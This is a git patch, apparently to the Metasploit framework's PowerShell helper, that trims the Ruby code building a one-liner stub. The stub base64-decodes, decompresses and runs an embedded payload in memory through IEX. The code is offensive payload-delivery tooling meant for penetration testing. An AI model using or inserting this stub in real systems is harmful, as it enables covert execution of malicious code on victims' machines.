From 86cfecdd9500ae31eef843b429a72c12d5f7a681 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:52:30 +0100
Subject: [PATCH] Shave some chars off compression code

---
 lib/rex/exploitation/powershell.rb | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index afb9e7d588..8c3229e935 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -43,17 +43,17 @@ module Powershell
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Read & delete the first two bytes due to incompatibility with MS
       psh_expression << "$s.ReadByte();"
       psh_expression << "$s.ReadByte();"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "$(IEX $(New-Object IO.StreamReader("
-      psh_expression << "$(New-Object IO.Compression.DeflateStream("
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.DeflateStream("
       psh_expression << "$s,"
       # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0))"
-      psh_expression << ")).ReadToEnd());"
+      psh_expression << "0)"
+      psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
@@ -83,14 +83,14 @@ module Powershell
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "$(IEX $(New-Object IO.StreamReader("
-      psh_expression << "$(New-Object IO.Compression.GzipStream("
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.GzipStream("
       psh_expression << "$s,"
       # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0))"
-      psh_expression << ")).ReadToEnd());"
+      psh_expression << "0)"
+      psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end